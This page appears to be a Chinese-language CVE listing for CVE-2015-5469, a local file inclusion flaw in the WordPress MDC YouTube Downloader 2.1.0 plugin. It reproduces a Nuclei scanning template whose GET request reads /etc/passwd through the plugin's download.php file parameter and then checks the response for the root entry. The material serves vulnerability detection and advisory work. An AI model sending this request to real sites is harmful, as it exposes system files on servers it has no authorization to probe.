CVE-2015-5469: WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion

日期: 2025-08-01 | 影响软件: WordPress MDC YouTube Downloader | POC: 已公开

漏洞描述

WordPress MDC YouTube Downloader 2.1.0 plugin is susceptible to local file inclusion. A remote attacker can read arbitrary files via a full pathname in the file parameter to includes/download.php.

PoC代码[已公开]

id: CVE-2015-5469

info:
  name: WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress MDC YouTube Downloader 2.1.0 plugin is susceptible to local file inclusion. A remote attacker can read arbitrary files via a full pathname in the file parameter to includes/download.php.
  impact: |
    The vulnerability can lead to unauthorized access to sensitive files, execution of arbitrary code, and potential compromise of the entire WordPress installation.
  remediation: |
    Update to the latest version of WordPress MDC YouTube Downloader plugin or apply the patch provided by the vendor.
  reference:
    - https://www.openwall.com/lists/oss-security/2015/07/10/5
    - http://www.vapid.dhs.org/advisory.php?v=133
    - http://www.openwall.com/lists/oss-security/2015/07/10/5
    - https://nvd.nist.gov/vuln/detail/CVE-2015-5469
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-5469
    cwe-id: CWE-22
    epss-score: 0.4911
    epss-percentile: 0.97712
    cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: mdc_youtube_downloader_project
    product: mdc_youtube_downloader
    framework: wordpress
  tags: cve2015,cve,wp,lfi,mdc_youtube_downloader_project,wordpress

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a004630440220396ade419872bb3e6a9026b8eb61661405d53d3ea21f1f7c79b16cd12b070e10022078f1e7de7085bb4972b0490ed7fca49e7110fecb5cdc36ede3485b0e07b76d6e:922c64590222798bb761d5b6d8e72950

相关漏洞推荐